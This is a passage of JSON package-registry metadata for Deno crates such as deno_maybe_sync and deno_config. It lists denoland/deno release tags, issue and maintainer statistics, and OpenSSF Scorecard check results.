ll,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.491Z","dependent_packages_count":0,"downloads":402782,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.57982777392854,"dependent_repos_count":20.37612590319707,"dependent_packages_count":26.975155894288825,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.31036985713814},"purl":"pkg:cargo/deno_maybe_sync","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_maybe_sync","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_maybe_sync","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_maybe_sync/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_maybe_sync/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-08-21T09:51:51.037Z","updated_at":"2025-08-21T09:51:51.037Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-08-19T20:30:20.369Z","updated_at":"2025-08-19T20:30:20.369Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8134422,"name":"deno_config","ecosystem":"cargo","description":"Config file implementation for the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":157,"first_release_published_at":"2023-08-23T14:04:20.242Z","latest_release_published_at":"2026-08-06T11:46:26.628Z","latest_release_number":"0.107.0","last_synced_at":"2026-08-29T21:57:08.137Z","created_at":"2023-08-23T14:10:42.630Z","updated_at":"2026-08-29T21:57:08.137Z","registry_url":"https://crates.io/crates/deno_config/","install_command":"cargo install deno_config","documentation_url":"https://docs.rs/deno_config/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact 